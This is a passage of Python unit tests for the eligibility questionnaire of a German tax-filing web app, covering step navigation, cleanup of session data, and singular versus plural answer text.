EmploymentDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step.handle()
self.assertEqual(session_data,
deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
def test_if_get_and_correct_data_from_session_then_do_not_delete_any_data(self):
session_data = {'marital_status_eligibility': 'single',
'separated_since_last_year_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'no',
'user_b_has_elster_account_eligibility': 'no',
'joint_taxes_eligibility': 'no',
'alimony_eligibility': 'no',
'pension_eligibility': 'yes',
'investment_income_eligibility': 'no',
'minimal_investment_income_eligibility': 'yes',
'taxed_investment_income_eligibility': 'no',
'cheaper_check_eligibility': 'no',
'employment_income_eligibility': 'no', }
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
EmploymentDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step.handle()
self.assertEqual(session_data,
deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
def test_if_get_and_full_data_from_session_then_delete_unnecessary_data(self):
only_necessary_data = {'marital_status_eligibility': 'single',
'separated_since_last_year_eligibility': 'no',
'separated_lived_together_eligibility': 'no',
'separated_joint_taxes_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'no',
'user_b_has_elster_account_eligibility': 'no',
'joint_taxes_eligibility': 'no',
'alimony_eligibility': 'no',
'pension_eligibility': 'yes',
'investment_income_eligibility': 'no',
'minimal_investment_income_eligibility': 'yes',
'taxed_investment_income_eligibility': 'no',
'cheaper_check_eligibility': 'no',
'employment_income_eligibility': 'no', }
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(FULL_SESSION_DATA)})
step = EligibilityStepChooser('eligibility').get_correct_step(
EmploymentDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step.handle()
self.assertEqual(only_necessary_data,
deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
def test_if_multiple_users_then_show_multiple_text(self):
session_data = {'marital_status_eligibility': 'married',
'separated_since_last_year_eligibility': 'no',
'joint_taxes_eligibility': 'yes',
'user_a_has_elster_account_eligibility': 'no',
'user_b_has_elster_account_eligibility': 'no',
'alimony_eligibility': 'no',
'pension_eligibility': 'yes',
'investment_income_eligibility': 'no',
'taxed_investment_income_eligibility': 'no',
'employment_income_eligibility': 'no'}
expected_number_of_users = 2
expected_choices = [('yes', ngettext('form.eligibility.employment_income.yes', 'form.eligibility.employment_income.yes', num=expected_number_of_users)),
('no', ngettext('form.eligibility.employment_income.no', 'form.eligibility.employment_income.no', num=expected_number_of_users))]
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
EmploymentDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step._pre_handle()
self.assertEqual(expected_choices, step.render_info.form.employment_income_eligibility.choices)
def test_if_single_user_then_show_single_text(self):
session_data = {'marital_status_eligibility': 'single',
'separated_since_last_year_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'no',
'user_b_has_elster_account_eligibility': 'no',
'joint_taxes_eligibility': 'no',
'alimony_eligibility': 'no',
'pension_eligibility': 'yes',
'investment_income_eligibility': 'no',
'taxed_investment_income_eligibility': 'no',
'employment_income_eligibility': 'no'}
expected_number_of_users = 1
expected_choices = [('yes', ngettext('form.eligibility.employment_income.yes', 'form.eligibility.employment_income.yes', num=expected_number_of_users)),
('no', ngettext('form.eligibility.employment_income.no', 'form.eligibility.employment_income.no', num=expected_number_of_users))]
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
EmploymentDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step._pre_handle()
self.assertEqual(expected_choices, step.render_info.form.employment_income_eligibility.choices)
class TestMarginalEmploymentIncomeEligibilityFailureDisplaySteuerlotseStep(unittest.TestCase):
@pytest.fixture(autouse=True)
def attach_fixtures(self, test_request_context):
self.req = test_request_context
def test_handle_sets_correct_prev_url(self):
step = MarginalEmploymentIncomeEligibilityFailureDisplaySteuerlotseStep(
endpoint='eligibility',
render_info=MarginalEmploymentIncomeEligibilityFailureDisplaySteuerlotseStep.prepare_render_info(
{}))
expected_url = step.url_for_step(MarginalEmploymentIncomeDecisionEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.prev_url)
class TestMarginalEmploymentIncomeDecisionEligibilityInputFormSteuerlotseStep(unittest.TestCase):
@pytest.fixture(autouse=True)
def attach_fixtures(self, app):
self.app = app
def setUp(self):
self.correct_session_data = {'marital_status_eligibility': 'divorced',
'joint_taxes_eligibility': 'no',
'alimony_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'no',
'pension_eligibility': 'yes',
'investment_income_eligibility': 'yes',
'minimal_investment_income_eligibility': 'no',
'taxed_investment_income_eligibility': 'yes',
'cheaper_check_eligibility': 'no',
'employment_income_eligibility': 'yes'}
def test_if_post_and_session_data_correct_and_input_data_correct_than_set_next_input_step(self):
with self.app.test_request_context(method='POST') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
MarginalEmploymentIncomeDecisionEligibilityInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict({'marginal_employment_eligibility': 'yes'}))
expected_url = step.url_for_step(IncomeOtherDecisionEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.next_url)
def test_if_session_data_correct_then_set_prev_input_step_correctly(self):
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
MarginalEmploymentIncomeDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
expected_url = step.url_for_step(EmploymentDecisionEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.prev_url)
def test_if_post_and_session_data_correct_and_input_data_incorrect_than_set_next_url_to_alternative_step(self):
with self.app.test_request_context(method='POST') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
MarginalEmploymentIncomeDecisionEligibilityInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict({'marginal_employment_eligibility': 'no'}))
expected_url = step.url_for_step(MarginalEmploymentIncomeEligibilityFailureDisplaySteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.next_url)
@pytest.mark.usefixtures('test_request_context')
def test_if_post_and_data_from_before_invalid_then_raise_incorrect_eligibility_data_error(self):
with patch('app.model.recursive_data.RecursiveDataModel.one_previous_field_has_to_be_set',
MagicMock(side_effect=PreviousFieldsMissingError)):
step = EligibilityStepChooser('eligibility').get_correct_step(
MarginalEmploymentIncomeDecisionEligibilityInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict({'marginal_employment_eligibility': 'yes'}))
self.assertRaises(IncorrectEligibilityData, step.handle)
def test_if_get_and_incorrect_data_from_session_then_delete_incorrect_data(self):
session_data = {'marital_status_eligibility': 'single',
'separated_since_last_year_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'no',
'user_b_has_elster_account_eligibility': 'no',
'joint_taxes_eligibility': 'no',
'alimony_eligibility': 'no',
'pension_eligibility': 'yes',
'investment_income_eligibility': 'no',
'minimal_investment_income_eligibility': 'yes',
'taxed_investment_income_eligibility': 'no',
'cheaper_check_eligibility': 'no',
'employment_income_eligibility': 'no',
'marginal_employment_eligibility': 'yes', }
session_data_with_incorrect_key = {**session_data, **{'INCORRECT_KEY': 'UNNECESSARY_VALUE'}}
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data_with_incorrect_key)})
step = EligibilityStepChooser('eligibility').get_correct_step(
MarginalEmploymentIncomeDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step.handle()
self.assertEqual(session_data,
deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
def test_if_get_and_correct_data_from_session_then_do_not_delete_any_data(self):
session_data = {'marital_status_eligibility': 'single',
'separated_since_last_year_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'no',
'user_b_has_elster_account_eligibility': 'no',
'joint_taxes_eligibility': 'no',
'alimony_eligibility': 'no',
'pension_eligibility': 'yes',
'investment_income_eligibility': 'no',
'minimal_investment_income_eligibility': 'yes',
'taxed_investment_income_eligibility': 'no',
'cheaper_check_eligibility': 'no',
'employment_income_eligibility': 'no',
'marginal_employment_eligibility': 'yes', }
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
MarginalEmploymentIncomeDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step.handle()
self.assertEqual(session_data,
deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
def test_if_get_and_full_data_from_session_then_delete_unnecessary_data(self):
only_necessary_data = {'marital_status_eligibility': 'single',
'separated_since_last_year_eligibility': 'no',
'separated_lived_together_eligibility': 'no',
'separated_joint_taxes_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'no',
'user_b_has_elster_account_eligibility': 'no',
'joint_taxes_eligibility': 'no',
'alimony_eligibility': 'no',
'pension_eligibility': 'yes',
'investment_income_eligibility': 'no',
'minimal_investment_income_eligibility': 'yes',
'taxed_investment_income_eligibility': 'no',
'cheaper_check_eligibility': 'no',
'employment_income_eligibility': 'no',
'marginal_employment_eligibility': 'yes', }
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(FULL_SESSION_DATA)})
step = EligibilityStepChooser('eligibility').get_correct_step(
MarginalEmploymentIncomeDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step.handle()
self.assertEqual(only_necessary_data,
deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
class TestIncomeOtherEligibilityFailureDisplaySteuerlotseStep(unittest.TestCase):
@pytest.fixture(autouse=True)
def attach_fixtures(self, test_request_context):
self.req = test_request_context
def test_handle_sets_correct_prev_url(self):
step = IncomeOtherEligibilityFailureDisplaySteuerlotseStep(
endpoint='eligibility',
render_info=IncomeOtherEligibilityFailureDisplaySteuerlotseStep.prepare_render_info(
{}))
expected_url = step.url_for_step(IncomeOtherDecisionEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.prev_url)
class TestIncomeOtherDecisionEligibilityInputFormSteuerlotseStep(unittest.TestCase):
@pytest.fixture(autouse=True)
def attach_fixtures(self, app):
self.app = app
def setUp(self):
self.correct_session_data = {'marital_status_eligibility': 'single',
'separated_since_last_year_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'no',
'user_b_has_elster_account_eligibility': 'no',
'joint_taxes_eligibility': 'no',
'alimony_eligibility': 'no',
'pension_eligibility': 'yes',
'investment_income_eligibility': 'no',
'minimal_investment_income_eligibility': 'yes',
'taxed_investment_income_eligibility': 'no',
'cheaper_check_eligibility': 'no',
'employment_income_eligibility': 'no',
'other_income_eligibility': 'no'}
def test_if_post_and_session_data_correct_and_input_data_correct_than_set_next_input_step(self):
with self.app.test_request_context(method='POST') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
IncomeOtherDecisionEligibilityInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict({'other_income_eligibility': 'no'}))
expected_url = step.url_for_step(ForeignCountriesDecisionEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.next_url)
def test_if_post_and_session_data_correct_and_input_data_incorrect_than_set_next_url_to_alternative_step(self):
with self.app.test_request_context(method='POST') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
IncomeOtherDecisionEligibilityInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict({'other_income_eligibility': 'yes'}))
expected_url = step.url_for_step(IncomeOtherEligibilityFailureDisplaySteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.next_url)
def test_if_no_employment_income_session_data_correct_then_set_prev_url_correct(self):
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
IncomeOtherDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
expected_url = step.url_for_step(EmploymentDecisionEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.prev_url)
def test_if_employment_income_but_marginal_session_data_correct_then_set_prev_url_correct(self):
alternative_data = {**self.correct_session_data.copy(),
**{'employment_income_eligibility': 'yes',
'marginal_employment_eligibility': 'yes'}}
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(alternative_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
IncomeOtherDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
expected_url = step.url_for_step(MarginalEmploymentIncomeDecisionEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.prev_url)
@pytest.mark.usefixtures('test_request_context')
def test_if_post_and_data_from_before_invalid_then_raise_incorrect_eligibility_data_error(self):
with patch('app.model.recursive_data.RecursiveDataModel.one_previous_field_has_to_be_set',
MagicMock(side_effect=PreviousFieldsMissingError)):
step = EligibilityStepChooser('eligibility').get_correct_step(
IncomeOtherDecisionEligibilityInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict({'other_income_eligibility': 'no'}))
self.assertRaises(IncorrectEligibilityData, step.handle)
def test_if_get_and_incorrect_data_from_session_then_delete_incorrect_data(self):
session_data = {'marital_status_eligibility': 'single',
'separated_since_last_year_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'no',
'user_b_has_elster_account_eligibility': 'no',
'joint_taxes_eligibility': 'no',
'alimony_eligibility': 'no',
'pension_eligibility': 'yes',
'investment_income_eligibility': 'no',
'minimal_investment_income_eligibility': 'yes',
'taxed_investment_income_eligibility': 'no',
'cheaper_check_eligibility': 'no',
'employment_income_eligibility': 'no',
'marginal_employment_eligibility': 'yes',
'other_income_eligibility': 'no'}
session_data_with_incorrect_key = {**session_data, **{'INCORRECT_KEY': 'UNNECESSARY_VALUE'}}
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data_with_incorrect_key)})
step = EligibilityStepChooser('eligibility').get_correct_step(
IncomeOtherDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step.handle()
self.assertEqual(session_data,
deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
def test_if_get_and_correct_data_from_session_then_do_not_delete_any_data(self):
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
IncomeOtherDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step.handle()
self.assertEqual(self.correct_session_data,
deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
def test_if_get_and_full_data_from_session_then_delete_unnecessary_data(self):
only_necessary_data = {'marital_status_eligibility': 'single',
'separated_since_last_year_eligibility': 'no',
'separated_lived_together_eligibility': 'no',
'separated_joint_taxes_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'no',
'user_b_has_elster_account_eligibility': 'no',
'joint_taxes_eligibility': 'no',
'alimony_eligibility': 'no',
'pension_eligibility': 'yes',
'investment_income_eligibility': 'no',
'minimal_investment_income_eligibility': 'yes',
'taxed_investment_income_eligibility': 'no',
'cheaper_check_eligibility': 'no',
'employment_income_eligibility': 'no',
'marginal_employment_eligibility': 'yes',
'other_income_eligibility': 'no'}
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(FULL_SESSION_DATA)})
step = EligibilityStepChooser('eligibility').get_correct_step(
IncomeOtherDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step.handle()
self.assertEqual(only_necessary_data,
deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
def test_if_multiple_users_then_show_multiple_text(self):
session_data = {'marital_status_eligibility': 'married',
'separated_since_last_year_eligibility': 'no',
'joint_taxes_eligibility': 'yes',
'user_a_has_elster_account_eligibility': 'no',
'user_b_has_elster_account_eligibility': 'no',
'alimony_eligibility': 'no',
'pension_eligibility': 'yes',
'investment_income_eligibility': 'no',
'taxed_investment_income_eligibility': 'no',
'employment_income_eligibility': 'no',
'marginal_employment_eligibility': 'yes'}
expected_number_of_users = 2
expected_choices = [('yes', ngettext('form.eligibility.income_other.yes', 'form.eligibility.income_other.yes', num=expected_number_of_users)),
('no', ngettext('form.eligibility.income_other.no', 'form.eligibility.income_other.no', num=expected_number_of_users))]
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
IncomeOtherDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step._pre_handle()
self.assertEqual(expected_choices, step.render_info.form.other_income_eligibility.choices)
def test_if_single_user_then_show_single_text(self):
session_data = {'marital_status_eligibility': 'single',
'separated_since_last_year_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'no',
'user_b_has_elster_account_eligibility': 'no',
'joint_taxes_eligibility': 'no',
'alimony_eligibility': 'no',
'pension_eligibility': 'yes',
'investment_income_eligibility': 'no',
'taxed_investment_income_eligibility': 'no',
'employment_income_eligibility': 'no',
'marginal_employment_eligibility': 'yes'}
expected_number_of_users = 1
expected_choices = [('yes', ngettext('form.eligibility.income_other.yes', 'form.eligibility.income_other.yes', num=expected_number_of_users)),
('no', ngettext('form.eligibility.income_other.no', 'form.eligibility.income_other.no', num=expected_number_of_users))]
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
IncomeOtherDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step._pre_handle()
self.assertEqual(expected_choices, step.render_info.form.other_income_eligibility.choices)
class TestForeignCountriesEligibilityFailureDisplaySteuerlotseStep(unittest.TestCase):
@pytest.fixture(autouse=True)
def attach_fixtures(self, test_request_context):
self.req = test_request_context
def test_handle_sets_correct_prev_url(self):
step = ForeignCountriesEligibilityFailureDisplaySteuerlotseStep(
endpoint='eligibility',
render_info=ForeignCountriesEligibilityFailureDisplaySteuerlotseStep.prepare_render_info(
{}))
expected_url = step.url_for_step(ForeignCountriesDecisionEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.prev_url)
class TestForeignCountriesDecisionEligibilityInputFormSteuerlotseStep:
@pytest.fixture
def correct_session_data(self):
correct_session_data = {
'marital_status_eligibility': 'divorced', 'joint_taxes_eligibility': 'no', 'alimony_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'no', 'pension_eligibility': 'yes',
'investment_income_eligibility': 'yes', 'minimal_investment_income_eligibility': 'no',
'taxed_investment_income_eligibility': 'yes', 'cheaper_check_eligibility': 'no',
'employment_income_eligibility': 'yes', 'marginal_employment_eligibility': 'yes',
'other_income_eligibility': 'no'}
return correct_session_data
@pytest.fixture
def correct_session_data_users_have_elster(self):
correct_session_data = {
'marital_status_eligibility': 'divorced', 'joint_taxes_eligibility': 'no', 'alimony_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'yes', 'user_b_has_elster_account_eligibility': 'yes',
'pension_eligibility': 'yes', 'investment_income_eligibility': 'yes', 'minimal_investment_income_eligibility': 'no',
'taxed_investment_income_eligibility': 'yes', 'cheaper_check_eligibility': 'no',
'employment_income_eligibility': 'yes', 'marginal_employment_eligibility': 'yes',
'other_income_eligibility': 'no'}
return correct_session_data
@pytest.fixture
def correct_session_data_user_a_have_elster(self):
correct_session_data = {
'marital_status_eligibility': 'divorced', 'joint_taxes_eligibility': 'no', 'alimony_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'yes', 'user_b_has_elster_account_eligibility': 'no',
'pension_eligibility': 'yes', 'investment_income_eligibility': 'yes', 'minimal_investment_income_eligibility': 'no',
'taxed_investment_income_eligibility': 'yes', 'cheaper_check_eligibility': 'no',
'employment_income_eligibility': 'yes', 'marginal_employment_eligibility': 'yes',
'other_income_eligibility': 'no'}
return correct_session_data
@pytest.fixture
def correct_session_data_single_user_a_have_elster(self):
correct_session_data = {
'marital_status_eligibility': 'single', 'joint_taxes_eligibility': 'yes', 'alimony_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'yes', 'pension_eligibility': 'yes',
'investment_income_eligibility': 'yes', 'minimal_investment_income_eligibility': 'no',
'taxed_investment_income_eligibility': 'yes', 'cheaper_check_eligibility': 'no',
'employment_income_eligibility': 'yes', 'marginal_employment_eligibility': 'yes',
'other_income_eligibility': 'no'}
return correct_session_data
def test_if_post_and_session_data_correct_and_input_data_correct_then_set_success_step(self, app, correct_session_data):
with app.test_request_context(method='POST') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
ForeignCountriesDecisionEligibilityInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict({'foreign_country_eligibility': 'no'}))
expected_url = step.url_for_step(EligibilitySuccessDisplaySteuerlotseStep.name)
step.handle()
assert step.render_info.next_url == expected_url
def test_if_post_and_session_data_correct_and_user_is_single_and_no_elster_account_input_data_correct_then_set_maybe_step(self, app, correct_session_data_single_user_a_have_elster):
with app.test_request_context(method='POST') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(correct_session_data_single_user_a_have_elster)})
step = EligibilityStepChooser('eligibility').get_correct_step(
ForeignCountriesDecisionEligibilityInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict({'foreign_country_eligibility': 'no'}))
expected_url = step.url_for_step(EligibilityMaybeDisplaySteuerlotseStep.name)
step.handle()
assert step.render_info.next_url == expected_url
def test_if_post_and_session_data_correct_and_both_user_has_elster_and_input_data_correct_then_set_maybe_step(self, app, correct_session_data_users_have_elster):
with app.test_request_context(method='POST') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(correct_session_data_users_have_elster)})
step = EligibilityStepChooser('eligibility').get_correct_step(
ForeignCountriesDecisionEligibilityInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict({'foreign_country_eligibility': 'no'}))
expected_url = step.url_for_step(EligibilityMaybeDisplaySteuerlotseStep.name)
step.handle()
assert step.render_info.next_url == expected_url
def test_if_post_and_session_data_correct_and_user_a_has_elster_and_input_data_correct_then_set_success_step(self, app, correct_session_data_user_a_have_elster):
with app.test_request_context(method='POST') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(correct_session_data_user_a_have_elster)})
step = EligibilityStepChooser('eligibility').get_correct_step(
ForeignCountriesDecisionEligibilityInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict({'foreign_country_eligibility': 'no'}))
expected_url = step.url_for_step(EligibilitySuccessDisplaySteuerlotseStep.name)
step.handle()
assert step.render_info.next_url == expected_url
def test_if_post_and_session_data_correct_and_input_data_incorrect_then_set_next_url_to_failure_step(self, app, correct_session_data):
with app.test_request_context(method='POST') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
ForeignCountriesDecisionEligibilityInputFormSteuerlotseStep.name, True,
ImmutableMultiDict({'foreign_country_eligibility': 'yes'}))
expected_url = step.url_for_step(ForeignCountriesEligibilityFailureDisplaySteuerlotseStep.name)
step.handle()
assert step.render_info.next_url == expected_url
def test_if_session_data_correct_then_set_prev_input_step_correctly(self, app, correct_session_data):
with app.test_request_context(method='GET') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
ForeignCountriesDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
expected_url = step.url_for_step(IncomeOtherDecisionEligibilityInputFormSteuerlotseStep.name)
step.handle()
assert step.render_info.prev_url == expected_url
def test_if_post_and_data_from_before_invalid_then_raise_incorrect_eligibility_data_error(self, app):
with app.test_request_context(method='POST'), \
patch('app.model.recursive_data.RecursiveDataModel.one_previous_field_has_to_be_set',
MagicMock(side_effect=PreviousFieldsMissingError)):
step = EligibilityStepChooser('eligibility').get_correct_step(
ForeignCountriesDecisionEligibilityInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict({'other_income_eligibility': 'no',
'foreign_country_eligibility': 'no'}))
with pytest.raises(IncorrectEligibilityData):
step.handle()
def test_if_get_and_incorrect_data_from_session_then_delete_incorrect_data(self, app):
session_data = {'marital_status_eligibility': 'single',
'separated_since_last_year_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'no',
'user_b_has_elster_account_eligibility': 'no',
'joint_taxes_eligibility': 'no',
'alimony_eligibility': 'no',
'pension_eligibility': 'yes',
'investment_income_eligibility': 'no',
'minimal_investment_income_eligibility': 'yes',
'taxed_investment_income_eligibility': 'no',
'cheaper_check_eligibility': 'no',
'employment_income_eligibility': 'no',
'marginal_employment_eligibility': 'yes',
'other_income_eligibility': 'no',
'foreign_country_eligibility': 'no'}
session_data_with_incorrect_key = {**session_data, **{'INCORRECT_KEY': 'UNNECESSARY_VALUE'}}
with app.test_request_context(method='GET') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data_with_incorrect_key)})
step = EligibilityStepChooser('eligibility').get_correct_step(
ForeignCountriesDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step.handle()
assert deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]) == session_data
def test_if_get_and_correct_data_from_session_then_do_not_delete_any_data(self, app, correct_session_data):
with app.test_request_context(method='GET') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
ForeignCountriesDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step.handle()
assert deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]) == correct_session_data
def test_if_get_and_full_data_from_session_then_delete_no_data(self, app):
with app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(FULL_SESSION_DATA)})
step = EligibilityStepChooser('eligibility').get_correct_step(
ForeignCountriesDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step.handle()
assert deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]) == FULL_SESSION_DATA
def test_if_multiple_users_then_show_multiple_text(self, app):
session_data = {'marital_status_eligibility': 'married',
'separated_since_last_year_eligibility': 'no',
'joint_taxes_eligibility': 'yes',
'user_a_has_elster_account_eligibility': 'no',
'user_b_has_elster_account_eligibility': 'no',
'alimony_eligibility': 'no',
'pension_eligibility': 'yes',
'investment_income_eligibility': 'no',
'taxed_investment_income_eligibility': 'no',
'employment_income_eligibility': 'no',
'marginal_employment_eligibility': 'yes',
'other_income_eligibility': 'no'}
expected_number_of_users = 2
expected_choices = [('yes', ngettext('form.eligibility.foreign_country.yes', 'form.eligibility.foreign_country.yes', num=expected_number_of_users)),
('no', ngettext('form.eligibility.foreign_country.no', 'form.eligibility.foreign_country.no', num=expected_number_of_users))]
with app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
ForeignCountriesDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step._pre_handle()
assert step.render_info.form.foreign_country_eligibility.choices == expected_choices
def test_if_single_user_then_show_single_text(self, app):
session_data = {'marital_status_eligibility': 'single',
'separated_since_last_year_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'no',
'user_b_has_elster_account_eligibility': 'no',
'joint_taxes_eligibility': 'no',
'alimony_eligibility': 'no',
'pension_eligibility': 'yes',
'investment_income_eligibility': 'no',
'taxed_investment_income_eligibility': 'no',
'employment_income_eligibility': 'no',
'marginal_employment_eligibility': 'yes',
'other_income_eligibility': 'no'}
expected_number_of_users = 1
expected_choices = [('yes', ngettext('form.eligibility.foreign_country.yes', 'form.eligibility.foreign_country.yes', num=expected_number_of_users)),
